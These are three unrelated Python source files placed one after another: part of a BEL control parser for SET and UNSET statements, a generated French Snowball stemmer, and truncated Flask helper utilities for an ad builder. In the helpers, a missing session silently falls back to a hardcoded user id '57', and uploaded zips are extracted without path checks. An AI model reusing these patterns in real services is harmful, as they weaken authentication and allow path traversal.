self.set_statements = set_tag("action") + MatchFirst(
[
self.set_statement_group,
self.set_citation,
self.set_evidence,
self.set_command,
self.set_command_list,
]
)
self.unset_statements = unset_tag("action") + MatchFirst(
[
self.unset_all,
self.unset_citation,
self.unset_evidence,
self.unset_statement_group,
self.unset_command,
self.unset_list,
]
)
self.language = self.set_statements | self.unset_statements
super(ControlParser, self).__init__(self.language)
@property
def _in_debug_mode(self) -> bool:
return not self.annotation_to_term and not self.annotation_to_pattern
@property
def citation_is_set(self) -> bool:
"""Check if the citation is set."""
return self.citation_db is not None and self.citation_db_id is not None
def has_enumerated_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined as an enumeration."""
return annotation in self.annotation_to_term
def has_regex_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined as a regular expression."""
return annotation in self.annotation_to_pattern
def has_local_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined locally."""
return annotation in self.annotation_to_local
def has_annotation(self, annotation: str) -> bool:
"""Check if the annotation is defined."""
return (
self.has_enumerated_annotation(annotation)
or self.has_regex_annotation(annotation)
or self.has_local_annotation(annotation)
)
def raise_for_undefined_annotation(self, line: str, position: int, annotation: str) -> None:
"""Raise an exception if the annotation is not defined.
:raises: UndefinedAnnotationWarning
"""
if self._in_debug_mode:
return
if not self.has_annotation(annotation):
raise UndefinedAnnotationWarning(self.get_line_number(), line, position, annotation)
def raise_for_invalid_annotation_value(self, line: str, position: int, key: str, value: str) -> None:
"""Raise an exception if the annotation is not defined.
:raises: IllegalAnnotationValueWarning or MissingAnnotationRegexWarning
"""
if self._in_debug_mode:
return
if self.has_enumerated_annotation(key) and value not in self.annotation_to_term[key]:
raise IllegalAnnotationValueWarning(self.get_line_number(), line, position, key, value)
elif self.has_regex_annotation(key) and not self.annotation_to_pattern[key].match(value):
raise MissingAnnotationRegexWarning(self.get_line_number(), line, position, key, value)
elif self.has_local_annotation(key) and value not in self.annotation_to_local[key]: # TODO condense
raise IllegalAnnotationValueWarning(self.get_line_number(), line, position, key, value)
def raise_for_missing_citation(self, line: str, position: int) -> None:
"""Raise an exception if there is no citation present in the parser.
:raises: MissingCitationException
"""
if self.citation_clearing and not self.citation_is_set:
raise MissingCitationException(self.get_line_number(), line, position)
def handle_annotation_key(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle an annotation key before parsing to validate that it's either enumerated or as a regex.
:raise: MissingCitationException or UndefinedAnnotationWarning
"""
key = tokens["key"]
self.raise_for_missing_citation(line, position)
self.raise_for_undefined_annotation(line, position, key)
return tokens
def handle_set_statement_group(self, _, __, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET STATEMENT_GROUP = "X"`` statement."""
self.statement_group = tokens["group"]
return tokens
def handle_set_citation(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET Citation = {"X", "Y", "Z", ...}`` statement."""
self.clear_citation()
values = tokens["values"]
if len(values) < 2:
raise CitationTooShortException(self.get_line_number(), line, position)
citation_namespace = values[0].lower()
citation_namespace = pc.CITATION_NORMALIZER.get(citation_namespace, citation_namespace)
if citation_namespace not in CITATION_TYPES:
raise InvalidCitationType(self.get_line_number(), line, position, citation_namespace)
if 2 == len(values):
citation_db_id = values[1]
elif 6 < len(values):
raise CitationTooLongException(self.get_line_number(), line, position)
else:
if 3 == len(values):
logger.debug("Throwing away JOURNAL entry in position 2")
else:
logger.debug("Throwing away JOURNAL entry in position 2 and everything after position 3")
citation_db_id = values[2]
if citation_namespace == "pubmed" and not is_int(citation_db_id):
raise InvalidPubMedIdentifierWarning(self.get_line_number(), line, position, citation_db_id)
self.citation_db = citation_namespace
self.citation_db_id = citation_db_id
return tokens
def handle_set_evidence(self, _, __, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET Evidence = ""`` statement."""
self.evidence = tokens["value"]
return tokens
def handle_set_command(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET X = "Y"`` statement."""
key, value = tokens["key"], tokens["value"]
self.raise_for_invalid_annotation_value(line, position, key, value)
self.annotations[key] = [Entity(namespace=key, identifier=value)]
return tokens
def handle_set_command_list(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle a ``SET X = {"Y", "Z", ...}`` statement."""
key, values = tokens["key"], tokens["values"]
for value in values:
self.raise_for_invalid_annotation_value(line, position, key, value)
self.annotations[key] = [Entity(namespace=key, identifier=value) for value in values]
return tokens
def handle_unset_statement_group(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Unset the statement group, or raises an exception if it is not set.
:raises: MissingAnnotationKeyWarning
"""
if self.statement_group is None:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, BEL_KEYWORD_STATEMENT_GROUP)
self.statement_group = None
return tokens
def handle_unset_citation(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Unset the citation, or raise an exception if it is not set.
:raises: MissingAnnotationKeyWarning
"""
if not self.citation_is_set:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, BEL_KEYWORD_CITATION)
self.clear_citation()
return tokens
def handle_unset_evidence(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Unset the evidence, or throws an exception if it is not already set.
The value for ``tokens[EVIDENCE]`` corresponds to which alternate of SupportingText or Evidence was used in
the BEL script.
:raises: MissingAnnotationKeyWarning
"""
if self.evidence is None:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, tokens[EVIDENCE])
self.evidence = None
return tokens
def validate_unset_command(self, line: str, position: int, annotation: str) -> None:
"""Raise an exception when trying to ``UNSET X`` if ``X`` is not already set.
:raises: MissingAnnotationKeyWarning
"""
if annotation not in self.annotations:
raise MissingAnnotationKeyWarning(self.get_line_number(), line, position, annotation)
def handle_unset_command(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle an ``UNSET X`` statement or raises an exception if it is not already set.
:raises: MissingAnnotationKeyWarning
"""
key = tokens["key"]
self.validate_unset_command(line, position, key)
del self.annotations[key]
return tokens
def handle_unset_list(self, line: str, position: int, tokens: ParseResults) -> ParseResults:
"""Handle ``UNSET {A, B, ...}`` or raises an exception of any of them are not present.
Consider that all unsets are in peril if just one of them is wrong!
:raises: MissingAnnotationKeyWarning
"""
for key in tokens["values"]:
if key in {BEL_KEYWORD_EVIDENCE, BEL_KEYWORD_SUPPORT}:
self.evidence = None
else:
self.validate_unset_command(line, position, key)
del self.annotations[key]
return tokens
def handle_unset_all(self, _, __, tokens) -> ParseResults:
"""Handle an ``UNSET_ALL`` statement."""
self.clear()
return tokens
def get_annotations(self) -> Dict[str, Any]:
"""Get the current annotations."""
return {
EVIDENCE: self.evidence,
CITATION: self.get_citation(),
ANNOTATIONS: self.annotations.copy(),
}
def get_citation(self) -> Optional[CitationDict]:
"""Get the citation dictionary."""
return (
CitationDict(namespace=self.citation_db, identifier=self.citation_db_id)
if self.citation_db and self.citation_db_id
else None
)
def get_missing_required_annotations(self) -> List[str]:
"""Return missing required annotations."""
return [
required_annotation
for required_annotation in self.required_annotations
if required_annotation not in self.annotations
]
def clear_citation(self) -> None:
"""Clear the citation and if citation clearing is enabled, clear the evidence and annotations."""
self.citation_db = None
self.citation_db_id = None
if self.citation_clearing:
self.evidence = None
self.annotations.clear()
def clear(self) -> None:
"""Clear the statement_group, citation, evidence, and annotations."""
self.statement_group = None
self.citation_db = None
self.citation_db_id = None
self.evidence = None
self.annotations.clear()
|
|
# Generated by Snowball 2.1.0 - https://snowballstem.org/
from .basestemmer import BaseStemmer
from .among import Among
class FrenchStemmer(BaseStemmer):
'''
This class implements the stemming algorithm defined by a snowball script.
Generated by Snowball 2.1.0 - https://snowballstem.org/
'''
a_0 = [
Among(u"col", -1, -1),
Among(u"par", -1, -1),
Among(u"tap", -1, -1)
]
a_1 = [
Among(u"", -1, 7),
Among(u"H", 0, 6),
Among(u"He", 1, 4),
Among(u"Hi", 1, 5),
Among(u"I", 0, 1),
Among(u"U", 0, 2),
Among(u"Y", 0, 3)
]
a_2 = [
Among(u"iqU", -1, 3),
Among(u"abl", -1, 3),
Among(u"I\u00E8r", -1, 4),
Among(u"i\u00E8r", -1, 4),
Among(u"eus", -1, 2),
Among(u"iv", -1, 1)
]
a_3 = [
Among(u"ic", -1, 2),
Among(u"abil", -1, 1),
Among(u"iv", -1, 3)
]
a_4 = [
Among(u"iqUe", -1, 1),
Among(u"atrice", -1, 2),
Among(u"ance", -1, 1),
Among(u"ence", -1, 5),
Among(u"logie", -1, 3),
Among(u"able", -1, 1),
Among(u"isme", -1, 1),
Among(u"euse", -1, 11),
Among(u"iste", -1, 1),
Among(u"ive", -1, 8),
Among(u"if", -1, 8),
Among(u"usion", -1, 4),
Among(u"ation", -1, 2),
Among(u"ution", -1, 4),
Among(u"ateur", -1, 2),
Among(u"iqUes", -1, 1),
Among(u"atrices", -1, 2),
Among(u"ances", -1, 1),
Among(u"ences", -1, 5),
Among(u"logies", -1, 3),
Among(u"ables", -1, 1),
Among(u"ismes", -1, 1),
Among(u"euses", -1, 11),
Among(u"istes", -1, 1),
Among(u"ives", -1, 8),
Among(u"ifs", -1, 8),
Among(u"usions", -1, 4),
Among(u"ations", -1, 2),
Among(u"utions", -1, 4),
Among(u"ateurs", -1, 2),
Among(u"ments", -1, 15),
Among(u"ements", 30, 6),
Among(u"issements", 31, 12),
Among(u"it\u00E9s", -1, 7),
Among(u"ment", -1, 15),
Among(u"ement", 34, 6),
Among(u"issement", 35, 12),
Among(u"amment", 34, 13),
Among(u"emment", 34, 14),
Among(u"aux", -1, 10),
Among(u"eaux", 39, 9),
Among(u"eux", -1, 1),
Among(u"it\u00E9", -1, 7)
]
a_5 = [
Among(u"ira", -1, 1),
Among(u"ie", -1, 1),
Among(u"isse", -1, 1),
Among(u"issante", -1, 1),
Among(u"i", -1, 1),
Among(u"irai", 4, 1),
Among(u"ir", -1, 1),
Among(u"iras", -1, 1),
Among(u"ies", -1, 1),
Among(u"\u00EEmes", -1, 1),
Among(u"isses", -1, 1),
Among(u"issantes", -1, 1),
Among(u"\u00EEtes", -1, 1),
Among(u"is", -1, 1),
Among(u"irais", 13, 1),
Among(u"issais", 13, 1),
Among(u"irions", -1, 1),
Among(u"issions", -1, 1),
Among(u"irons", -1, 1),
Among(u"issons", -1, 1),
Among(u"issants", -1, 1),
Among(u"it", -1, 1),
Among(u"irait", 21, 1),
Among(u"issait", 21, 1),
Among(u"issant", -1, 1),
Among(u"iraIent", -1, 1),
Among(u"issaIent", -1, 1),
Among(u"irent", -1, 1),
Among(u"issent", -1, 1),
Among(u"iront", -1, 1),
Among(u"\u00EEt", -1, 1),
Among(u"iriez", -1, 1),
Among(u"issiez", -1, 1),
Among(u"irez", -1, 1),
Among(u"issez", -1, 1)
]
a_6 = [
Among(u"a", -1, 3),
Among(u"era", 0, 2),
Among(u"asse", -1, 3),
Among(u"ante", -1, 3),
Among(u"\u00E9e", -1, 2),
Among(u"ai", -1, 3),
Among(u"erai", 5, 2),
Among(u"er", -1, 2),
Among(u"as", -1, 3),
Among(u"eras", 8, 2),
Among(u"\u00E2mes", -1, 3),
Among(u"asses", -1, 3),
Among(u"antes", -1, 3),
Among(u"\u00E2tes", -1, 3),
Among(u"\u00E9es", -1, 2),
Among(u"ais", -1, 3),
Among(u"erais", 15, 2),
Among(u"ions", -1, 1),
Among(u"erions", 17, 2),
Among(u"assions", 17, 3),
Among(u"erons", -1, 2),
Among(u"ants", -1, 3),
Among(u"\u00E9s", -1, 2),
Among(u"ait", -1, 3),
Among(u"erait", 23, 2),
Among(u"ant", -1, 3),
Among(u"aIent", -1, 3),
Among(u"eraIent", 26, 2),
Among(u"\u00E8rent", -1, 2),
Among(u"assent", -1, 3),
Among(u"eront", -1, 2),
Among(u"\u00E2t", -1, 3),
Among(u"ez", -1, 2),
Among(u"iez", 32, 2),
Among(u"eriez", 33, 2),
Among(u"assiez", 33, 3),
Among(u"erez", 32, 2),
Among(u"\u00E9", -1, 2)
]
a_7 = [
Among(u"e", -1, 3),
Among(u"I\u00E8re", 0, 2),
Among(u"i\u00E8re", 0, 2),
Among(u"ion", -1, 1),
Among(u"Ier", -1, 2),
Among(u"ier", -1, 2)
]
a_8 = [
Among(u"ell", -1, -1),
Among(u"eill", -1, -1),
Among(u"enn", -1, -1),
Among(u"onn", -1, -1),
Among(u"ett", -1, -1)
]
g_v = [17, 65, 16, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 130, 103, 8, 5]
g_keep_with_s = [1, 65, 20, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128]
I_p2 = 0
I_p1 = 0
I_pV = 0
def __r_prelude(self):
while True:
v_1 = self.cursor
try:
try:
while True:
v_2 = self.cursor
try:
try:
v_3 = self.cursor
try:
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.bra = self.cursor
try:
v_4 = self.cursor
try:
if not self.eq_s(u"u"):
raise lab6()
self.ket = self.cursor
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab6()
if not self.slice_from(u"U"):
return False
raise lab5()
except lab6: pass
self.cursor = v_4
try:
if not self.eq_s(u"i"):
raise lab7()
self.ket = self.cursor
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab7()
if not self.slice_from(u"I"):
return False
raise lab5()
except lab7: pass
self.cursor = v_4
if not self.eq_s(u"y"):
raise lab4()
self.ket = self.cursor
if not self.slice_from(u"Y"):
return False
except lab5: pass
raise lab3()
except lab4: pass
self.cursor = v_3
try:
self.bra = self.cursor
if not self.eq_s(u"\u00EB"):
raise lab8()
self.ket = self.cursor
if not self.slice_from(u"He"):
return False
raise lab3()
except lab8: pass
self.cursor = v_3
try:
self.bra = self.cursor
if not self.eq_s(u"\u00EF"):
raise lab9()
self.ket = self.cursor
if not self.slice_from(u"Hi"):
return False
raise lab3()
except lab9: pass
self.cursor = v_3
try:
self.bra = self.cursor
if not self.eq_s(u"y"):
raise lab10()
self.ket = self.cursor
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab10()
if not self.slice_from(u"Y"):
return False
raise lab3()
except lab10: pass
self.cursor = v_3
if not self.eq_s(u"q"):
raise lab2()
self.bra = self.cursor
if not self.eq_s(u"u"):
raise lab2()
self.ket = self.cursor
if not self.slice_from(u"U"):
return False
except lab3: pass
self.cursor = v_2
raise lab1()
except lab2: pass
self.cursor = v_2
if self.cursor >= self.limit:
raise lab0()
self.cursor += 1
except lab1: pass
continue
except lab0: pass
self.cursor = v_1
break
return True
def __r_mark_regions(self):
self.I_pV = self.limit
self.I_p1 = self.limit
self.I_p2 = self.limit
v_1 = self.cursor
try:
try:
v_2 = self.cursor
try:
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab2()
if not self.in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab2()
if self.cursor >= self.limit:
raise lab2()
self.cursor += 1
raise lab1()
except lab2: pass
self.cursor = v_2
try:
if self.find_among(FrenchStemmer.a_0) == 0:
raise lab3()
raise lab1()
except lab3: pass
self.cursor = v_2
if self.cursor >= self.limit:
raise lab0()
self.cursor += 1
if not self.go_out_grouping(FrenchStemmer.g_v, 97, 251):
raise lab0()
self.cursor += 1
except lab1: pass
self.I_pV = self.cursor
except lab0: pass
self.cursor = v_1
v_3 = self.cursor
try:
if not self.go_out_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
if not self.go_in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
self.I_p1 = self.cursor
if not self.go_out_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
if not self.go_in_grouping(FrenchStemmer.g_v, 97, 251):
raise lab4()
self.cursor += 1
self.I_p2 = self.cursor
except lab4: pass
self.cursor = v_3
return True
def __r_postlude(self):
while True:
v_1 = self.cursor
try:
self.bra = self.cursor
among_var = self.find_among(FrenchStemmer.a_1)
if among_var == 0:
raise lab0()
self.ket = self.cursor
if among_var == 1:
if not self.slice_from(u"i"):
return False
elif among_var == 2:
if not self.slice_from(u"u"):
return False
elif among_var == 3:
if not self.slice_from(u"y"):
return False
elif among_var == 4:
if not self.slice_from(u"\u00EB"):
return False
elif among_var == 5:
if not self.slice_from(u"\u00EF"):
return False
elif among_var == 6:
if not self.slice_del():
return False
else:
if self.cursor >= self.limit:
raise lab0()
self.cursor += 1
continue
except lab0: pass
self.cursor = v_1
break
return True
def __r_RV(self):
if not self.I_pV <= self.cursor:
return False
return True
def __r_R1(self):
if not self.I_p1 <= self.cursor:
return False
return True
def __r_R2(self):
if not self.I_p2 <= self.cursor:
return False
return True
def __r_standard_suffix(self):
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_4)
if among_var == 0:
return False
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
return False
if not self.slice_del():
return False
elif among_var == 2:
if not self.__r_R2():
return False
if not self.slice_del():
return False
v_1 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"ic"):
self.cursor = self.limit - v_1
raise lab0()
self.bra = self.cursor
try:
v_2 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab2()
if not self.slice_del():
return False
raise lab1()
except lab2: pass
self.cursor = self.limit - v_2
if not self.slice_from(u"iqU"):
return False
except lab1: pass
except lab0: pass
elif among_var == 3:
if not self.__r_R2():
return False
if not self.slice_from(u"log"):
return False
elif among_var == 4:
if not self.__r_R2():
return False
if not self.slice_from(u"u"):
return False
elif among_var == 5:
if not self.__r_R2():
return False
if not self.slice_from(u"ent"):
return False
elif among_var == 6:
if not self.__r_RV():
return False
if not self.slice_del():
return False
v_3 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_2)
if among_var == 0:
self.cursor = self.limit - v_3
raise lab3()
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_del():
return False
self.ket = self.cursor
if not self.eq_s_b(u"at"):
self.cursor = self.limit - v_3
raise lab3()
self.bra = self.cursor
if not self.__r_R2():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_del():
return False
elif among_var == 2:
try:
v_4 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab5()
if not self.slice_del():
return False
raise lab4()
except lab5: pass
self.cursor = self.limit - v_4
if not self.__r_R1():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_from(u"eux"):
return False
except lab4: pass
elif among_var == 3:
if not self.__r_R2():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_del():
return False
else:
if not self.__r_RV():
self.cursor = self.limit - v_3
raise lab3()
if not self.slice_from(u"i"):
return False
except lab3: pass
elif among_var == 7:
if not self.__r_R2():
return False
if not self.slice_del():
return False
v_5 = self.limit - self.cursor
try:
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_3)
if among_var == 0:
self.cursor = self.limit - v_5
raise lab6()
self.bra = self.cursor
if among_var == 1:
try:
v_6 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab8()
if not self.slice_del():
return False
raise lab7()
except lab8: pass
self.cursor = self.limit - v_6
if not self.slice_from(u"abl"):
return False
except lab7: pass
elif among_var == 2:
try:
v_7 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab10()
if not self.slice_del():
return False
raise lab9()
except lab10: pass
self.cursor = self.limit - v_7
if not self.slice_from(u"iqU"):
return False
except lab9: pass
else:
if not self.__r_R2():
self.cursor = self.limit - v_5
raise lab6()
if not self.slice_del():
return False
except lab6: pass
elif among_var == 8:
if not self.__r_R2():
return False
if not self.slice_del():
return False
v_8 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"at"):
self.cursor = self.limit - v_8
raise lab11()
self.bra = self.cursor
if not self.__r_R2():
self.cursor = self.limit - v_8
raise lab11()
if not self.slice_del():
return False
self.ket = self.cursor
if not self.eq_s_b(u"ic"):
self.cursor = self.limit - v_8
raise lab11()
self.bra = self.cursor
try:
v_9 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab13()
if not self.slice_del():
return False
raise lab12()
except lab13: pass
self.cursor = self.limit - v_9
if not self.slice_from(u"iqU"):
return False
except lab12: pass
except lab11: pass
elif among_var == 9:
if not self.slice_from(u"eau"):
return False
elif among_var == 10:
if not self.__r_R1():
return False
if not self.slice_from(u"al"):
return False
elif among_var == 11:
try:
v_10 = self.limit - self.cursor
try:
if not self.__r_R2():
raise lab15()
if not self.slice_del():
return False
raise lab14()
except lab15: pass
self.cursor = self.limit - v_10
if not self.__r_R1():
return False
if not self.slice_from(u"eux"):
return False
except lab14: pass
elif among_var == 12:
if not self.__r_R1():
return False
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
if not self.slice_del():
return False
elif among_var == 13:
if not self.__r_RV():
return False
if not self.slice_from(u"ant"):
return False
return False
elif among_var == 14:
if not self.__r_RV():
return False
if not self.slice_from(u"ent"):
return False
return False
else:
v_11 = self.limit - self.cursor
if not self.in_grouping_b(FrenchStemmer.g_v, 97, 251):
return False
if not self.__r_RV():
return False
self.cursor = self.limit - v_11
if not self.slice_del():
return False
return False
return True
def __r_i_verb_suffix(self):
if self.cursor < self.I_pV:
return False
v_2 = self.limit_backward
self.limit_backward = self.I_pV
self.ket = self.cursor
if self.find_among_b(FrenchStemmer.a_5) == 0:
self.limit_backward = v_2
return False
self.bra = self.cursor
v_3 = self.limit - self.cursor
try:
if not self.eq_s_b(u"H"):
raise lab0()
self.limit_backward = v_2
return False
except lab0: pass
self.cursor = self.limit - v_3
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
self.limit_backward = v_2
return False
if not self.slice_del():
return False
self.limit_backward = v_2
return True
def __r_verb_suffix(self):
if self.cursor < self.I_pV:
return False
v_2 = self.limit_backward
self.limit_backward = self.I_pV
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_6)
if among_var == 0:
self.limit_backward = v_2
return False
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
self.limit_backward = v_2
return False
if not self.slice_del():
return False
elif among_var == 2:
if not self.slice_del():
return False
else:
if not self.slice_del():
return False
v_3 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"e"):
self.cursor = self.limit - v_3
raise lab0()
self.bra = self.cursor
if not self.slice_del():
return False
except lab0: pass
self.limit_backward = v_2
return True
def __r_residual_suffix(self):
v_1 = self.limit - self.cursor
try:
self.ket = self.cursor
if not self.eq_s_b(u"s"):
self.cursor = self.limit - v_1
raise lab0()
self.bra = self.cursor
v_2 = self.limit - self.cursor
try:
v_3 = self.limit - self.cursor
try:
if not self.eq_s_b(u"Hi"):
raise lab2()
raise lab1()
except lab2: pass
self.cursor = self.limit - v_3
if not self.out_grouping_b(FrenchStemmer.g_keep_with_s, 97, 232):
self.cursor = self.limit - v_1
raise lab0()
except lab1: pass
self.cursor = self.limit - v_2
if not self.slice_del():
return False
except lab0: pass
if self.cursor < self.I_pV:
return False
v_5 = self.limit_backward
self.limit_backward = self.I_pV
self.ket = self.cursor
among_var = self.find_among_b(FrenchStemmer.a_7)
if among_var == 0:
self.limit_backward = v_5
return False
self.bra = self.cursor
if among_var == 1:
if not self.__r_R2():
self.limit_backward = v_5
return False
try:
v_6 = self.limit - self.cursor
try:
if not self.eq_s_b(u"s"):
raise lab4()
raise lab3()
except lab4: pass
self.cursor = self.limit - v_6
if not self.eq_s_b(u"t"):
self.limit_backward = v_5
return False
except lab3: pass
if not self.slice_del():
return False
elif among_var == 2:
if not self.slice_from(u"i"):
return False
else:
if not self.slice_del():
return False
self.limit_backward = v_5
return True
def __r_un_double(self):
v_1 = self.limit - self.cursor
if self.find_among_b(FrenchStemmer.a_8) == 0:
return False
self.cursor = self.limit - v_1
self.ket = self.cursor
if self.cursor <= self.limit_backward:
return False
self.cursor -= 1
self.bra = self.cursor
if not self.slice_del():
return False
return True
def __r_un_accent(self):
v_1 = 1
while True:
try:
if not self.out_grouping_b(FrenchStemmer.g_v, 97, 251):
raise lab0()
v_1 -= 1
continue
except lab0: pass
break
if v_1 > 0:
return False
self.ket = self.cursor
try:
v_3 = self.limit - self.cursor
try:
if not self.eq_s_b(u"\u00E9"):
raise lab2()
raise lab1()
except lab2: pass
self.cursor = self.limit - v_3
if not self.eq_s_b(u"\u00E8"):
return False
except lab1: pass
self.bra = self.cursor
if not self.slice_from(u"e"):
return False
return True
def _stem(self):
v_1 = self.cursor
self.__r_prelude()
self.cursor = v_1
self.__r_mark_regions()
self.limit_backward = self.cursor
self.cursor = self.limit
v_3 = self.limit - self.cursor
try:
try:
v_4 = self.limit - self.cursor
try:
v_5 = self.limit - self.cursor
try:
v_6 = self.limit - self.cursor
try:
if not self.__r_standard_suffix():
raise lab4()
raise lab3()
except lab4: pass
self.cursor = self.limit - v_6
try:
if not self.__r_i_verb_suffix():
raise lab5()
raise lab3()
except lab5: pass
self.cursor = self.limit - v_6
if not self.__r_verb_suffix():
raise lab2()
except lab3: pass
self.cursor = self.limit - v_5
v_7 = self.limit - self.cursor
try:
self.ket = self.cursor
try:
v_8 = self.limit - self.cursor
try:
if not self.eq_s_b(u"Y"):
raise lab8()
self.bra = self.cursor
if not self.slice_from(u"i"):
return False
raise lab7()
except lab8: pass
self.cursor = self.limit - v_8
if not self.eq_s_b(u"\u00E7"):
self.cursor = self.limit - v_7
raise lab6()
self.bra = self.cursor
if not self.slice_from(u"c"):
return False
except lab7: pass
except lab6: pass
raise lab1()
except lab2: pass
self.cursor = self.limit - v_4
if not self.__r_residual_suffix():
raise lab0()
except lab1: pass
except lab0: pass
self.cursor = self.limit - v_3
v_9 = self.limit - self.cursor
self.__r_un_double()
self.cursor = self.limit - v_9
v_10 = self.limit - self.cursor
self.__r_un_accent()
self.cursor = self.limit - v_10
self.cursor = self.limit_backward
v_11 = self.cursor
self.__r_postlude()
self.cursor = v_11
return True
class lab0(BaseException): pass
class lab1(BaseException): pass
class lab2(BaseException): pass
class lab3(BaseException): pass
class lab4(BaseException): pass
class lab5(BaseException): pass
class lab6(BaseException): pass
class lab7(BaseException): pass
class lab8(BaseException): pass
class lab9(BaseException): pass
class lab10(BaseException): pass
class lab11(BaseException): pass
class lab12(BaseException): pass
class lab13(BaseException): pass
class lab14(BaseException): pass
class lab15(BaseException): pass
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Get builder form, depending on format."""
import os
import random
import time
import zipfile
from flask import request
from lib.adcase import db
from google.cloud import storage
def get_user_id(req):
"""get current user id.
Args:
req: flask request
Returns:
String user id
"""
h = req.values.get("hash")
user_id = db.res("SELECT user_id from sessions where enabled=1 and hash=%s",
(h))
if not user_id:
user_id = "57"
return user_id
def file_put_contents(file_name, content):
"""save content to file.
Args:
file_name: local file name
content: text content to save
"""
# create dir of not exists
try:
os.mkdir(os.path.dirname(file_name))
except:
pass
# write to file. create new or replace
fh = open(file_name, "w+")
fh.write(content)
fh.close()
def file_get_contents(filename):
"""Return the content of a file relative to current dir.
Args:
filename: url relative to current file
Returns:
File content as String. Empty string if file not found
"""
try:
txt = open(filename).read()
except OSError:
txt = ""
return txt
def create_zip(path, zip_filename):
"""save content to file.
Args:
path: directory to zip
zip_filename: full path to new created zip file.
Returns:
Zipfile
"""
try:
ziph = zipfile.ZipFile(zip_filename, "w", zipfile.ZIP_DEFLATED)
for root, _, files in os.walk(path):
for file2 in files:
ziph.write(
os.path.join(root, file2),
os.path.join(root, file2)[len(path):])
ziph.close()
return True
except zipfile.BadZipFile:
return False
def get_tmp_file_name():
"""get a random-ish number.
used to create temp folders.
Returns:
random string of numbers
"""
out = (
str(round(time.time() * 100000)) +
str(random.randint(10000000, 99999999)))
return out
def mk_dir(dir):
try:
os.mkdir(dir)
except:
pass
def save_to_storage(file_name, destination_file):
"""Uploads file to cloud storage.
Args:
file_name: file to save
destination_file: location of new file in storage
Returns:
string with the downloadable storage url
"""
client = storage.Client()
bucket = client.get_bucket(os.environ.get("CLOUD_BUCKET_NAME"))
blob = bucket.blob(destination_file)
blob.upload_from_filename(file_name)
return "https://storage.googleapis.com/{}/{}".format(
os.environ.get("CLOUD_BUCKET_NAME"), destination_file
)
def save_file(file_to_save, location):
"""Saves a file to a specific location.
Args:
file_to_save: file to save
location: destination
"""
try:
os.mkdir(os.path.dirname(location))
except:
pass
file_to_save.save(location)
def extract_zip(zfile, dir2):
"""Extracts a zipfile into a new dir.
Args:
zfile: file to unzip
dir2: destination
Returns:
True or False if ok
"""
try:
delete(dir2)
os.mkdir(dir2)
zfile.save(dir2 + "-1.zip")
zip_ref = zipfile.ZipFile(dir2 + "-1.zip", "r")
zip_ref.extractall(dir2)
zip_ref.close()
os.remove(dir2 + "-1.zip")
return True
except zipfile.BadZipFile:
return False
def delete(top):
"""Deletes a subdir.
Args:
top: top level dir to delete
"""
for root, dirs, files in os.walk(top, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
if os.path.exists(top):
os.rmdir(top)
def clean_tmp(dir2):
"""Deletes temp files after a build process.
Args:
dir2: top level dir to delete
"""
delete(dir2)
try:
os.remove(dir2 + "-1.zip")
except:
pass
def get_int_param(n):
"""Returns payload, post or get parameter value as int.
Args:
n: parameter name
"""
return to_int(get_param(n))
def get_param(n):
"""Returns payload, post or get parameter value as String.
Args:
